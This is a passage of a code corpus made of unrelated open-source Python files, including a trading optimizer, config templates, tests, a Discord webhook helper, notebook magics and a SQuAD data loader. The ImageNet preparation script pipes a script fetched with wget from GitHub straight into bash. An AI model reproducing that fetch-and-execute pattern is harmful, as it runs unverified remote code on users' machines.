# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import pyalgotrade.logger
from pyalgotrade.optimizer import base
from pyalgotrade.optimizer import xmlrpcserver
logger = pyalgotrade.logger.getLogger(__name__)
class Results(object):
"""The results of the strategy executions."""
def __init__(self, parameters, result):
self.__parameters = parameters
self.__result = result
def getParameters(self):
"""Returns a sequence of parameter values."""
return self.__parameters
def getResult(self):
"""Returns the result for a given set of parameters."""
return self.__result
def serve(barFeed, strategyParameters, address, port):
"""Executes a server that will provide bars and strategy parameters for workers to use.
:param barFeed: The bar feed that each worker will use to backtest the strategy.
:type barFeed: :class:`pyalgotrade.barfeed.BarFeed`.
:param strategyParameters: The set of parameters to use for backtesting. An iterable object where **each element is a tuple that holds parameter values**.
:param address: The address to listen for incoming worker connections.
:type address: string.
:param port: The port to listen for incoming worker connections.
:type port: int.
:rtype: A :class:`Results` instance with the best results found or None if no results were obtained.
"""
paramSource = base.ParameterSource(strategyParameters)
resultSinc = base.ResultSinc()
s = xmlrpcserver.Server(paramSource, resultSinc, barFeed, address, port)
logger.info("Starting server")
s.serve()
logger.info("Server finished")
ret = None
bestResult, bestParameters = resultSinc.getBest()
if bestResult is not None:
logger.info("Best final result %s with parameters %s" % (bestResult, bestParameters.args))
ret = Results(bestParameters.args, bestResult)
else:
logger.error("No results. All jobs failed or no jobs were processed.")
return ret
|
build_files/buildbot/codesign/config_server_template.py | intrigus/blender-1 | 116 | 12748625 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
# Configuration of a code signer which is specific to the code signing server.
#
# NOTE: DO NOT put any sensitive information here, put it in an actual
# configuration on the signing machine.
from pathlib import Path
from codesign.config_common import *
# URL to the timestamping authority.
TIMESTAMP_AUTHORITY_URL = 'http://timestamp.digicert.com'
# Full path to the certificate used for signing.
#
# The path and expected file format might vary depending on a platform.
#
# On Windows it is usually is a PKCS #12 key (.pfx), so the path will look
# like Path('C:\\Secret\\Blender.pfx').
CERTIFICATE_FILEPATH: Path
# https://docs.python.org/3/library/logging.config.html#configuration-dictionary-schema
LOGGING = {
'version': 1,
'formatters': {
'default': {'format': '%(asctime)-15s %(levelname)8s %(name)s %(message)s'}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'default',
'stream': 'ext://sys.stderr',
}
},
'loggers': {
'codesign': {'level': 'INFO'},
},
'root': {
'level': 'WARNING',
'handlers': [
'console',
],
}
}
|
finalists/yc14600/PyTorch-Encoding/scripts/prepare_imagenet.py | lrzpellegrini/cvpr_clvision_challenge | 2,190 | 12748635 | """Prepare the ImageNet dataset"""
import os
import argparse
import tarfile
import pickle
import gzip
import subprocess
from tqdm import tqdm
import subprocess
from encoding.utils import check_sha1, download, mkdir
_TARGET_DIR = os.path.expanduser('~/.encoding/data/ILSVRC2012')
_TRAIN_TAR = 'ILSVRC2012_img_train.tar'
_TRAIN_TAR_SHA1 = '43eda4fe35c1705d6606a6a7a633bc965d194284'
_VAL_TAR = 'ILSVRC2012_img_val.tar'
_VAL_TAR_SHA1 = '5f3f73da3395154b60528b2b2a2caf2374f5f178'
def parse_args():
parser = argparse.ArgumentParser(
description='Setup the ImageNet dataset.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--download-dir', required=True,
help="The directory that contains downloaded tar files")
parser.add_argument('--target-dir', default=_TARGET_DIR,
help="The directory to store extracted images")
parser.add_argument('--checksum', action='store_true',
help="If check integrity before extracting.")
parser.add_argument('--with-rec', action='store_true',
help="If build image record files.")
parser.add_argument('--num-thread', type=int, default=1,
help="Number of threads to use when building image record file.")
args = parser.parse_args()
return args
def check_file(filename, checksum, sha1):
if not os.path.exists(filename):
raise ValueError('File not found: '+filename)
if checksum and not check_sha1(filename, sha1):
raise ValueError('Corrupted file: '+filename)
def extract_train(tar_fname, target_dir, with_rec=False, num_thread=1):
mkdir(target_dir)
with tarfile.open(tar_fname) as tar:
print("Extracting "+tar_fname+"...")
# extract each class one-by-one
pbar = tqdm(total=len(tar.getnames()))
for class_tar in tar:
pbar.set_description('Extract '+class_tar.name)
tar.extract(class_tar, target_dir)
class_fname = os.path.join(target_dir, class_tar.name)
class_dir = os.path.splitext(class_fname)[0]
os.mkdir(class_dir)
with tarfile.open(class_fname) as f:
f.extractall(class_dir)
os.remove(class_fname)
pbar.update(1)
pbar.close()
def extract_val(tar_fname, target_dir, with_rec=False, num_thread=1):
mkdir(target_dir)
print('Extracting ' + tar_fname)
with tarfile.open(tar_fname) as tar:
tar.extractall(target_dir)
# build rec file before images are moved into subfolders
# move images to proper subfolders
subprocess.call(["wget -qO- https://raw.githubusercontent.com/soumith/imagenetloader.torch/master/valprep.sh | bash"],
cwd=target_dir, shell=True)
def main():
args = parse_args()
target_dir = os.path.expanduser(args.target_dir)
#if os.path.exists(target_dir):
# raise ValueError('Target dir ['+target_dir+'] exists. Remove it first')
download_dir = os.path.expanduser(args.download_dir)
train_tar_fname = os.path.join(download_dir, _TRAIN_TAR)
check_file(train_tar_fname, args.checksum, _TRAIN_TAR_SHA1)
val_tar_fname = os.path.join(download_dir, _VAL_TAR)
check_file(val_tar_fname, args.checksum, _VAL_TAR_SHA1)
build_rec = args.with_rec
if build_rec:
os.makedirs(os.path.join(target_dir, 'rec'))
extract_train(train_tar_fname, os.path.join(target_dir, 'train'), build_rec, args.num_thread)
extract_val(val_tar_fname, os.path.join(target_dir, 'val'), build_rec, args.num_thread)
if __name__ == '__main__':
main()
|
tests/test_provider_vmware_vmc.py | mjuenema/python-terrascript | 507 | 12748637 | # tests/test_provider_vmware_vmc.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:30:35 UTC)
def test_provider_import():
import terrascript.provider.vmware.vmc
def test_resource_import():
from terrascript.resource.vmware.vmc import vmc_cluster
from terrascript.resource.vmware.vmc import vmc_public_ip
from terrascript.resource.vmware.vmc import vmc_sddc
from terrascript.resource.vmware.vmc import vmc_site_recovery
from terrascript.resource.vmware.vmc import vmc_srm_node
def test_datasource_import():
from terrascript.data.vmware.vmc import vmc_connected_accounts
from terrascript.data.vmware.vmc import vmc_customer_subnets
from terrascript.data.vmware.vmc import vmc_org
from terrascript.data.vmware.vmc import vmc_sddc
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.vmware.vmc
#
# t = terrascript.provider.vmware.vmc.vmc()
# s = str(t)
#
# assert 'https://github.com/vmware/terraform-provider-vmc' in s
# assert '1.7.0' in s
|
sqlite_table_check.py | nicetone/Python | 28,321 | 12748653 | <reponame>nicetone/Python
# Script Name : sqlite_table_check.py
# Author : <NAME>
# Created : 07 June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Checks the main SQLITE database to ensure all the tables should exist
import os
import sqlite3
dropbox = os.getenv("dropbox")
config = os.getenv("my_config")
dbfile = ("Databases\jarvis.db")
listfile = ("sqlite_master_table.lst")
master_db = os.path.join(dropbox, dbfile)
config_file = os.path.join(config, listfile)
tablelist = open(config_file, 'r');
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute('SELECT SQLITE_VERSION()')
data = cursor.fetchone()
if str(data) == "(u'3.6.21',)":
print("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n")
else:
print("\nDB On different version than master version - !!!!! \n")
conn.close()
print("\nCheckling " + master_db + " against " + config_file + "\n")
for table in tablelist.readlines():
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute("select count(*) from sqlite_master where name = ?", (table.strip(),))
res = cursor.fetchone()
if (res[0]):
print('[+] Table : ' + table.strip() + ' exists [+]')
else:
print('[-] Table : ' + table.strip() + ' does not exist [-]')
|
Src/StdLib/Lib/whichdb.py | cwensley/ironpython2 | 6,989 | 12748662 | # !/usr/bin/env python
"""Guess which db package to use to open a db file."""
import os
import struct
import sys
try:
import dbm
_dbmerror = dbm.error
except ImportError:
dbm = None
# just some sort of valid exception which might be raised in the
# dbm test
_dbmerror = IOError
def whichdb(filename):
"""Guess which db package to use to open a db file.
Return values:
- None if the database file can't be read;
- empty string if the file can be read but can't be recognized
- the module name (e.g. "dbm" or "gdbm") if recognized.
Importing the given module may still fail, and opening the
database using that module may still fail.
"""
# Check for dbm first -- this has a .pag and a .dir file
try:
f = open(filename + os.extsep + "pag", "rb")
f.close()
# dbm linked with gdbm on OS/2 doesn't have .dir file
if not (dbm.library == "GNU gdbm" and sys.platform == "os2emx"):
f = open(filename + os.extsep + "dir", "rb")
f.close()
return "dbm"
except IOError:
# some dbm emulations based on Berkeley DB generate a .db file
# some do not, but they should be caught by the dbhash checks
try:
f = open(filename + os.extsep + "db", "rb")
f.close()
# guarantee we can actually open the file using dbm
# kind of overkill, but since we are dealing with emulations
# it seems like a prudent step
if dbm is not None:
d = dbm.open(filename)
d.close()
return "dbm"
except (IOError, _dbmerror):
pass
# Check for dumbdbm next -- this has a .dir and a .dat file
try:
# First check for presence of files
os.stat(filename + os.extsep + "dat")
size = os.stat(filename + os.extsep + "dir").st_size
# dumbdbm files with no keys are empty
if size == 0:
return "dumbdbm"
f = open(filename + os.extsep + "dir", "rb")
try:
if f.read(1) in ("'", '"'):
return "dumbdbm"
finally:
f.close()
except (OSError, IOError):
pass
# See if the file exists, return None if not
try:
f = open(filename, "rb")
except IOError:
return None
# Read the start of the file -- the magic number
s16 = f.read(16)
f.close()
s = s16[0:4]
# Return "" if not at least 4 bytes
if len(s) != 4:
return ""
# Convert to 4-byte int in native byte order -- return "" if impossible
try:
(magic,) = struct.unpack("=l", s)
except struct.error:
return ""
# Check for GNU dbm
if magic in (0x13579ace, 0x13579acd, 0x13579acf):
return "gdbm"
# Check for old Berkeley db hash file format v2
if magic in (0x00061561, 0x61150600):
return "bsddb185"
# Later versions of Berkeley db hash file have a 12-byte pad in
# front of the file type
try:
(magic,) = struct.unpack("=l", s16[-4:])
except struct.error:
return ""
# Check for BSD hash
if magic in (0x00061561, 0x61150600):
return "dbhash"
# Unknown
return ""
if __name__ == "__main__":
for filename in sys.argv[1:]:
print whichdb(filename) or "UNKNOWN", filename
|
discord_embedded_message/message.py | sonalimahajan12/Automation-scripts | 496 | 12748674 | import datetime
import json
import requests
def send_message(
webhook_url: str,
content_msg="",
title="",
title_url="",
color=00000000,
timestamp=datetime.datetime.now().isoformat(),
footer_icon="",
footer="",
thumbnail_url="",
author="",
author_url="",
author_icon_url="",
text_name="",
text="",
):
payload = {
"content": content_msg,
"embeds": [
{
"title": title,
"url": title_url,
"color": color,
"timestamp": timestamp,
"footer": {
"icon_url": footer_icon,
"text": footer,
},
"thumbnail": {"url": thumbnail_url},
"author": {
"name": author,
"url": author_url,
"icon_url": author_icon_url,
},
"fields": [
{
"name": text_name,
"value": text,
}
],
}
],
}
print(">> Sending To WebHook...")
payload = json.dumps(payload)
headers = {"Content-Type": "application/json"}
response = requests.post(webhook_url, headers=headers, data=payload)
return response
def example_calling():
webhook_url = "your_webhook_url"
response = send_message(
webhook_url,
content_msg="Some random text",
title="Discord Embed example",
title_url="https://discordjs.guide/popular-topics/embeds.html#embed-preview",
color=15335679,
footer_icon="https://github.githubassets.com/favicons/favicon-dark.png",
footer="May the Force be with you",
thumbnail_url="https://avatars.githubusercontent.com/u/55619686",
author="OjusWiZard",
author_url="https://github.com/OjusWiZard/",
author_icon_url="https://avatars.githubusercontent.com/u/55619686",
text_name=":point_down: :point_down: :point_down:",
text="This is a test message",
)
print("Status: ", response.status_code)
if __name__ == "__main__":
example_calling()
|
fugue_notebook/env.py | fugue-project/fugue | 547 | 12748697 | <reponame>fugue-project/fugue
# pylint: disable=W0611,W0613
import html
import json
from typing import Any, Callable, Dict, List
import fugue_sql
import pandas as pd
from fugue import (
ExecutionEngine,
NativeExecutionEngine,
make_execution_engine,
register_execution_engine,
)
from fugue.dataframe import YieldedDataFrame
from fugue.extensions._builtins.outputters import Show
from IPython.core.magic import Magics, cell_magic, magics_class, needs_local_scope
from IPython.display import HTML, display
from triad import ParamDict, Schema
from triad.utils.convert import to_instance
class NotebookSetup(object):
"""Jupyter notebook environment customization template."""
def get_pre_conf(self) -> Dict[str, Any]:
"""The default config for all registered execution engine"""
return {}
def get_post_conf(self) -> Dict[str, Any]:
"""The enforced config for all registered execution engine.
Users should not set these configs manually, if they set, the values
must match this dict, otherwise, exceptions will be thrown
"""
return {}
def get_pretty_print(self) -> Callable:
"""Fugue dataframe pretty print handler"""
return _default_pretty_print
def register_execution_engines(self):
"""Register execution engines with names. This will also try to register
spark and dask engines if the dependent packages are available and they
are not registered"""
register_execution_engine(
"native",
lambda conf, **kwargs: NativeExecutionEngine(conf=conf),
on_dup="ignore",
)
try:
import pyspark # noqa: F401
import fugue_spark # noqa: F401
except ImportError:
pass
try:
import dask.dataframe # noqa: F401
import fugue_dask # noqa: F401
except ImportError:
pass
@magics_class
class _FugueSQLMagics(Magics):
"""Fugue SQL Magics"""
def __init__(
self,
shell: Any,
pre_conf: Dict[str, Any],
post_conf: Dict[str, Any],
fsql_ignore_case: bool = False,
):
# You must call the parent constructor
super().__init__(shell)
self._pre_conf = pre_conf
self._post_conf = post_conf
self._fsql_ignore_case = fsql_ignore_case
@needs_local_scope
@cell_magic("fsql")
def fsql(self, line: str, cell: str, local_ns: Any = None) -> None:
dag = fugue_sql.fsql(cell, local_ns, fsql_ignore_case=self._fsql_ignore_case)
dag.run(self.get_engine(line, {} if local_ns is None else local_ns))
for k, v in dag.yields.items():
if isinstance(v, YieldedDataFrame):
local_ns[k] = v.result # type: ignore
else:
local_ns[k] = v # type: ignore
def get_engine(self, line: str, lc: Dict[str, Any]) -> ExecutionEngine:
line = line.strip()
p = line.find("{")
if p >= 0:
engine = line[:p].strip()
conf = json.loads(line[p:])
else:
parts = line.split(" ", 1)
engine = parts[0]
conf = ParamDict(None if len(parts) == 1 else lc[parts[1]])
cf = dict(self._pre_conf)
cf.update(conf)
for k, v in self._post_conf.items():
if k in cf and cf[k] != v:
raise ValueError(
f"{k} must be {v}, but you set to {cf[k]}, you may unset it"
)
cf[k] = v
if "+" in engine:
return make_execution_engine(tuple(engine.split("+", 1)), cf)
return make_execution_engine(engine, cf)
def _default_pretty_print(
schema: Schema,
head_rows: List[List[Any]],
title: Any,
rows: int,
count: int,
):
components: List[Any] = []
if title is not None:
components.append(HTML(f"<h3>{html.escape(title)}</h3>"))
pdf = pd.DataFrame(head_rows, columns=list(schema.names))
components.append(pdf)
if count >= 0:
components.append(HTML(f"<strong>total count: {count}</strong>"))
components.append(HTML(f"<small>schema: {schema}</small>"))
display(*components)
def _setup_fugue_notebook(
ipython: Any, setup_obj: Any, fsql_ignore_case: bool = False
) -> None:
s = NotebookSetup() if setup_obj is None else to_instance(setup_obj, NotebookSetup)
magics = _FugueSQLMagics(
ipython,
dict(s.get_pre_conf()),
dict(s.get_post_conf()),
fsql_ignore_case=fsql_ignore_case,
)
ipython.register_magics(magics)
s.register_execution_engines()
Show.set_hook(s.get_pretty_print())
|
slybot/slybot/starturls/generator.py | hackrush01/portia | 6,390 | 12748703 | <reponame>hackrush01/portia
from collections import OrderedDict
from datetime import datetime
from itertools import chain, product
from scrapy.utils.spider import arg_to_iter
import six
try:
from itertools import izip_longest
except ImportError:
from itertools import zip_longest as izip_longest
from six.moves.urllib.parse import urlencode
class IdentityGenerator():
def __call__(self, spec):
return spec
class UrlGenerator(object):
def __init__(self, settings=None, spider_args=None):
self._processors = {
'date': self._process_date,
'default': self._process_default,
'options': self._process_option,
'range': self._process_range,
'settings': self._process_setting,
'spider_args': self._process_args
}
self.settings = settings
self.spider_args = spider_args
def _process_date(self, values):
now = datetime.now()
return [now.strftime(v) for v in values]
def _process_default(self, values):
return [str(values[0])]
def _process_option(self, values):
return [str(v) for v in values]
def _process_range(self, values):
if len(values) > 3:
return []
return six.moves.range(*values)
def _process_setting(self, values):
if self.settings is None:
return []
results = []
for value in values:
results.extend(self.settings.getlist(value))
return results
def _process_args(self, values):
if self.spider_args is None:
return []
results = []
for value in values:
results.extend(arg_to_iter(self.spider_args.get(value, [])))
return results
def _build_section(self, descriptor, params=False):
if 'type' not in descriptor or 'values' not in descriptor:
return [] # Malformed descriptor
processor = self._processors.get(descriptor['type'])
if processor is None:
return []
processed = processor(descriptor['values'])
if not params:
return processed
if 'name' not in descriptor:
return []
return izip_longest([], processed, fillvalue=descriptor['name'])
def _generate_urls(self, template, paths, params_template, params):
path_length = len(paths)
if params and not paths:
components = product(*params)
else:
components = product(*chain(paths, params))
for values in components:
url = template.format(*values[:path_length])
params = values[path_length:]
if params_template or params:
url_params = OrderedDict(params_template)
for name, value in params:
url_params[name] = value
url_params = urlencode(url_params)
yield '{}?{}'.format(url, url_params)
else:
yield url
def __call__(self, spec):
template = spec['template']
param = spec.get('params_template', {})
paths = [self._build_section(d) for d in spec.get('paths', [])]
params = [self._build_section(d, True) for d in spec.get('params', [])]
url_generator = self._generate_urls(template, paths, param, params)
return url_generator
generator = UrlGenerator()
|
test/test_tls.py | alexmv/python-binary-memcached | 103 | 12748707 | import os
import pytest
import subprocess
import ssl
import time
import trustme
import bmemcached
import test_simple_functions
ca = trustme.CA()
server_cert = ca.issue_cert(os.environ["MEMCACHED_HOST"] + u"")
@pytest.yield_fixture(scope="module", autouse=True)
def memcached_tls():
key = server_cert.private_key_pem
cert = server_cert.cert_chain_pems[0]
with cert.tempfile() as c, key.tempfile() as k:
p = subprocess.Popen(
[
"memcached",
"-p5001",
"-Z",
"-o",
"ssl_key={}".format(k),
"-o",
"ssl_chain_cert={}".format(c),
"-o",
"ssl_verify_mode=1",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
time.sleep(0.1)
if p.poll() is not None:
pytest.skip("Memcached server is not built with TLS support.")
yield p
p.kill()
p.wait()
class TLSMemcachedTests(test_simple_functions.MemcachedTests):
"""
Same tests as above, just make sure it works with TLS.
"""
def setUp(self):
ctx = ssl.create_default_context()
ca.configure_trust(ctx)
self.server = "{}:5001".format(os.environ["MEMCACHED_HOST"])
self.client = bmemcached.Client(self.server, tls_context=ctx)
self.reset()
|
dataset/squad_dataset.py | jamaalhay/Final_Proj | 104 | 12748718 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'han'
import os
import h5py
import math
import torch
import torch.utils.data
from torch.utils.data.sampler import Sampler, SequentialSampler
import logging
import pandas as pd
from dataset.preprocess_data import PreprocessData
from utils.functions import *
logger = logging.getLogger(__name__)
class SquadDataset:
"""
dataset module for SQuAD
"""
def __init__(self, global_config):
self._data = {}
self._attr = {}
self.meta_data = {}
self.global_config = global_config
# whether preprocessing squad dataset
is_exist_dataset_h5 = os.path.exists(self.global_config['data']['dataset_h5'])
assert is_exist_dataset_h5, 'not found dataset hdf5 file in %s' % self.global_config['data']['dataset_h5']
self._load_hdf5()
def _load_hdf5(self):
"""
load squad hdf5 file
:return:
"""
squad_h5_path = self.global_config['data']['dataset_h5']
with h5py.File(squad_h5_path, 'r') as f:
f_data = f['data']
for name in ['train', 'dev']:
self._data[name] = {}
for sub_name in ['answer_range', 'samples_id']:
self._data[name][sub_name] = np.array(f_data[name][sub_name])
for sub_name in ['context', 'question']:
cur_data = f_data[name][sub_name]
self._data[name][sub_name] = {}
# 'token', 'pos', 'ent', 'em', 'em_lemma', 'right_space'
for subsub_name in cur_data.keys():
self._data[name][sub_name][subsub_name] = np.array(cur_data[subsub_name])
for key, value in f.attrs.items():
self._attr[key] = value
# 'id2word', 'id2char', 'id2pos', 'id2ent'
for key in f['meta_data'].keys():
self.meta_data[key] = np.array(f['meta_data'][key])
self._char2id = dict(zip(self.meta_data['id2char'],
range(len(self.meta_data['id2char']))))
def get_dataloader_train(self, batch_size, num_workers):
"""
a train data dataloader
:param batch_size:
:return:
"""
return self.get_dataloader(batch_size, 'train', num_workers, shuffle=True)
def get_dataloader_dev(self, batch_size, num_workers):
"""
a dev data dataloader
:param batch_size:
:return:
"""
return self.get_dataloader(batch_size, 'dev', num_workers, shuffle=False)
def get_dataloader(self, batch_size, type, num_workers, shuffle):
"""
get dataloader on train or dev dataset
:param batch_size:
:param type: 'train' or 'dev'
:return:
"""
data = self._data[type]
dataset = CQA_Dataset(data['context'],
data['question'],
data['answer_range'],
self.meta_data,
self.global_config['preprocess'])
if shuffle:
sampler = SortedBatchSampler(dataset.get_lengths(), batch_size)
else:
sampler = SequentialSampler(dataset)
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
sampler=sampler,
collate_fn=self.collect_fun,
num_workers=num_workers)
return dataloader
def collect_fun(self, batch):
"""
collect function for DataLoader, will generate char idx currently
:param batch:
:return:
"""
context = []
context_f = []
question = []
question_f = []
answer_range = []
for ele in batch:
context.append(ele[0])
question.append(ele[1])
context_f.append(ele[2])
question_f.append(ele[3])
answer_range.append(ele[4])
# word idx
bat_context, max_ct_len = del_zeros_right(torch.stack(context, dim=0))
bat_question, max_qt_len = del_zeros_right(torch.stack(question, dim=0))
bat_answer, _ = del_zeros_right(torch.stack(answer_range, dim=0))
# additional features
bat_context_f = None
bat_question_f = None
if context_f[0] is not None:
bat_context_f = torch.stack(context_f, dim=0)[:, 0:max_ct_len, :]
bat_question_f = torch.stack(question_f, dim=0)[:, 0:max_qt_len, :]
# generate char idx
bat_context_char = None
bat_question_char = None
if self.global_config['preprocess']['use_char']:
bat_context_char = self._batch_word_to_char(bat_context)
bat_question_char = self._batch_word_to_char(bat_question)
return bat_context, bat_question, bat_context_char, bat_question_char, bat_context_f, bat_question_f, bat_answer
def get_batch_train(self, batch_size):
"""
a train data batch
.. warning::
This method is now deprecated in favor of
:func:`get_dataloader_train`.
"""
return self.get_batch_data(batch_size, 'train')
def get_batch_dev(self, batch_size):
"""
development data batch
.. warning::
This method is now deprecated in favor of
:func:`get_dataloader_dev`.
"""
return self.get_batch_data(batch_size, 'dev')
def get_batch_data(self, batch_size, type):
"""
same with BatchSampler
.. warning::
This method is now deprecated in favor of
:func:`BatchSampler` and `get_dataloader`.
"""
data = self._data[type]
data_size = len(data['context'])
i = 0
while i < data_size:
j = min(i + batch_size, data_size)
bat = [data['context'][i:j], data['question'][i:j], data['answer_range'][i:j]]
bat_tensor = [to_long_tensor(x) for x in bat]
i = j
yield bat_tensor
def get_all_samples_id_train(self):
return self.get_all_samples_id('train')
def get_all_samples_id_dev(self):
return self.get_all_samples_id('dev')
def get_all_samples_id(self, type):
"""
get samples id of 'train' or 'dev' data
:param type:
:return:
"""
data = self._data[type]
return data['samples_id']
def get_all_ct_right_space_train(self):
return self.get_all_ct_right_space('train')
def get_all_ct_right_space_dev(self):
return self.get_all_ct_right_space('dev')
def get_all_ct_right_space(self, type):
data = self._data[type]
return data['context']['right_space']
def get_train_batch_cnt(self, batch_size):
"""
get count of train batches
:param batch_size: single batch size
:return: count
"""
data_size = self._attr['train_size']
cnt_batch = math.ceil(data_size * 1.0 / batch_size)
return cnt_batch
def get_dev_batch_cnt(self, batch_size):
"""
get count of dev batches
:param batch_size: single batch size
:return: count
"""
data_size = self._attr['dev_size']
cnt_batch = math.ceil(data_size * 1.0 / batch_size)
return cnt_batch
def _batch_word_to_char(self, batch_wordid):
"""
transform batch with sentence of wordid to batch data with sentence of char id
:param batch_wordid: (batch, seq_len), torch tensor
:return: (batch, seq_len, word_len), torch tensor
"""
batch_wordid = batch_wordid.numpy()
batch_word = [self.sentence_id2word(x) for x in batch_wordid]
batch_length = [[len(x) if x != PreprocessData.padding else 0 for x in s] for s in batch_word]
batch_max_len = np.max(batch_length)
batch_char = list(map(lambda x: self.sentence_char2id(x, max_len=batch_max_len), batch_word))
batch_char = np.stack(batch_char, axis=0)
return to_long_tensor(batch_char)
def gen_batch_with_char(self, batch_data, enable_char, device):
"""
word batch to generate char barch, also move to device, used in train or valid steps
.. warning::
This method is now deprecated in favor of collect function in DataLoader
"""
batch_data = [del_zeros_right(x)[0] for x in batch_data]
if not enable_char:
bat_context, bat_question, bat_answer_range = [x.to(device) for x in batch_data]
bat_context_char = None
bat_question_char = None
else:
bat_context, bat_question, bat_answer_range = batch_data
bat_context_char = self._batch_word_to_char(bat_context)
bat_question_char = self._batch_word_to_char(bat_question)
bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range = [x.to(device) for x in
[bat_context,
bat_question,
bat_context_char,
bat_question_char,
bat_answer_range]]
return bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range
def sentence_id2word(self, s_id):
"""
transform a sentence with word id to a sentence with real word
:param s_id:
:return:
"""
s = map(lambda id: self.meta_data['id2word'][id], s_id)
return list(s)
def sentence_word2id(self, s):
"""
transform a sentence with word to a sentence with word id
(Note that it's a slow version when using np.where)
:param s:
:return:
"""
s_id = map(lambda word: np.where(self.meta_data['id2word'] == word)[0][0], s)
return np.array(list(s_id))
def word_id2char(self, w_id):
w = map(lambda id: self.meta_data['id2char'][id], w_id)
return list(w)
def word_char2id(self, w):
if w == PreprocessData.padding: # not actual word
return np.ones(1, ) # make sure word length>0 and right encoding, here any none-zero value not effect
w_id = map(lambda ch: self._char2id[ch], w)
return np.array(list(w_id))
def sentence_char2id(self, s, max_len=None):
s_cid = list(map(lambda w: self.word_char2id(w), s))
if max_len is None:
word_len = list(map(lambda x: len(x), s_cid))
max_len = np.max(word_len)
s_cid_pad = map(lambda x: np.pad(x, (0, max_len - len(x)), 'constant', constant_values=(0, 0)), s_cid)
return np.stack(list(s_cid_pad), axis=0)
def gather_context_seq_len(self, type, steps=None):
"""
gather the context sequence counts with different lengths
:param type: 'train' or 'dev' data
:param steps: set to None means default steps
:return:
"""
data = self._data[type]
context = to_long_tensor(data['context']['token'])
mask = compute_mask(context)
lengths = mask.eq(1).long().sum(1).squeeze()
length_pd = pd.DataFrame(data=lengths.numpy(), columns=['length'])
if steps is None:
steps = [0, 100, 200, 300, 400, 500, 600, 700, 800]
assert len(steps) > 0
# get step length cnt
real_step = []
step_length_cnt = []
for i in range(1, len(steps)):
lower_bound = steps[i - 1]
upper_bound = steps[i]
assert lower_bound < upper_bound # [lower_bound, upper_bound)
real_step.append((lower_bound, upper_bound))
valid = length_pd[(length_pd['length'] < upper_bound) & (length_pd['length'] >= lower_bound)]
tmp_cnt = valid.shape[0]
step_length_cnt.append(tmp_cnt)
rtn_step_length = list(zip(real_step, step_length_cnt))
# get all length cnt
length_cnt = length_pd['length'].value_counts().to_frame(name='cnt')
length_cnt['length'] = length_cnt.index
return rtn_step_length, length_cnt
def gather_answer_seq_len(self, type, max_len=None):
"""
gather the answer sequence counts with different lengths
:param type: 'train' or 'dev' data
:param max_len:
:return:
"""
data = self._data[type]
answer_range = data['answer_range']
lengths = []
for i in range(answer_range.shape[0]):
tmp_lens = []
for j in range(int(answer_range.shape[1] / 2)):
if answer_range[i, j * 2] != -1:
tmp_lens.append(answer_range[i, j * 2 + 1] - answer_range[i, j * 2] + 1)
lengths.append(min(tmp_lens))
length_pd = pd.DataFrame(data=lengths, columns=['length'])
# get all length cnt
length_cnt = length_pd['length'].value_counts().to_frame(name='cnt')
length_cnt['length'] = length_cnt.index
length_cnt = length_cnt.sort_index()
if max_len is not None:
sum_len = length_cnt[length_cnt['length'] >= max_len]['cnt'].sum()
length_cnt = length_cnt[length_cnt['length'] < max_len]
length_cnt.loc[max_len] = [sum_len, '>=%d' % max_len]
return length_cnt
class CQA_Dataset(torch.utils.data.Dataset):
"""
squad like dataset, used for dataloader
Args:
- context: (batch, ct_len)
- question: (batch, qt_len)
- answer_range: (batch, ans_len)
"""
def __init__(self, context, question, answer_range, feature_dict, config):
self.context = context
self.question = question
self.answer_range = answer_range
self.feature_dict = feature_dict
self.config = config
self.lengths = self.get_lengths()
def __getitem__(self, index):
cur_context = to_long_tensor(self.context['token'][index])
cur_question = to_long_tensor(self.question['token'][index])
cur_answer = to_long_tensor(self.answer_range[index])
cur_context_f, cur_question_f = self.addition_feature(index)
return cur_context, cur_question, cur_context_f, cur_question_f, cur_answer
def __len__(self):
return self.answer_range.shape[0]
def get_lengths(self):
ct_mask = self.context['token'].__ne__(PreprocessData.padding_idx)
ct_lengths = ct_mask.sum(1)
qt_mask = self.question['token'].__ne__(PreprocessData.padding_idx)
qt_lengths = qt_mask.sum(1)
lengths = np.stack([ct_lengths, qt_lengths])
return lengths
def addition_feature(self, index):
data = [self.context, self.question]
add_features = [None, None]
for k in range(len(data)):
features = {}
tmp_seq_len = data[k]['token'].shape[1]
if self.config['use_pos']:
features['pos'] = torch.zeros((tmp_seq_len, len(self.feature_dict['id2pos'])), dtype=torch.float)
for i, ele in enumerate(data[k]['pos'][index]):
if ele == PreprocessData.padding_idx:
break
features['pos'][i, ele] = 1
if self.config['use_ent']:
features['ent'] = torch.zeros((tmp_seq_len, len(self.feature_dict['id2ent'])), dtype=torch.float)
for i, ele in enumerate(data[k]['ent'][index]):
if ele == PreprocessData.padding_idx:
break
